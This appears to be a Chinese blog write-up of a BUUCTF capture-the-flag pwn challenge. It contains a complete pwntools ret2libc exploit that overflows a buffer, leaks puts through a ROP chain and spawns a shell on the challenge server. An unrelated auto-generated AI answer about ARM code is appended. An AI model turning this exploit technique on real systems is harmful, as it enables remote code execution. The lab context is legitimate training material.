BUUCTF--pwn--ciscn_2019_c_1【ret2libc_64】

保护

ida

encrypt()里有个get(s),可以栈溢出,确定题型ret2libc。

要先绕过main()的循环和if语句即v4=1,到达encrypt()。

可见encrypt()进行了加密操作,需要绕过加密,避免payload受损。

发现strlen(),进行字符串截断,执行break语句。

准备 

 exp

from pwn import*
from LibcSearcher import*
elf=ELF("/home/error/桌面/ciscn_2019_c_1")
context.log_level="debug"
#i=process("/home/error/桌面/ciscn_2019_c_1")
i=remote("node4.buuoj.cn",29583)
i.sendlineafter("Input your choice!\n",b"1")
i.recvline()

puts_plt=elf.plt["puts"]
puts_got=elf.got["puts"]
main=elf.sym["main"]
pop_rdi=0x0000000000400c83
ret=0x00000000004006b9

p1=b"\x00"+cyclic(0x50+8-1)+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main)
i.sendline(p1)
puts_addr=u64(i.recvuntil("\x7f")[-6:].ljust(8,b"\x00"))
print(hex(puts_addr))

libc=LibcSearcher("puts",puts_addr)
libc_base=puts_addr-libc.dump("puts")
sys_addr=libc_base+libc.dump("system")
she_addr=libc_base+libc.dump("str_bin_sh")
print(hex(sys_addr))
i.sendlineafter("Input your choice!\n",b"1")
i.recvline()

p2=b"\x00"+cyclic(0x50+8-1)+p64(ret)+p64(pop_rdi)+p64(she_addr)+p64(sys_addr)
#注意是Ubuntu 18,有栈对齐问题,这个点也困扰了我好一会
i.sendline(p2)
i.interactive()






思考

scanf函数用法:

C语言scanf函数用法完全攻略 (biancheng.net)

ubuntu18栈对齐问题:关于ubuntu18版本以上调用64位程序中的system函数的栈对齐问题 - ZikH26 - 博客园 (cnblogs.com)

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
这段代码是关于ARM架构的程序,其中包含了一些函数和变量的定义。引用\[1\]是一个函数`SpiReverseBitOrder`,它接受一个16位的数据作为输入,并将其按位反转后返回一个8位的结果。引用\[2\]是关于ARM架构中栈布局的说明,其中提到了R11和PC的值保存在栈底,并给出了相应的指令。引用\[3\]是一个完整的exploit代码,用于攻击一个ARM架构的程序。其中包含了一些地址和payload的设置,以及调用shellcode的过程。 至于问题中的`ack_PCS = bit64 << (slave_W-1);`,这段代码没有在提供的引用中出现,所以无法给出具体的解释。请提供更多的上下文信息,以便我能够更好地回答你的问题。 #### 引用[.reference_title] - *1* [逆向-还原代码之bit-order (Arm 64)](https://blog.csdn.net/xiaozhiwise/article/details/128399013)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [mips&arm&aarch64-pwn初探](https://blog.csdn.net/seaaseesa/article/details/105281585)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值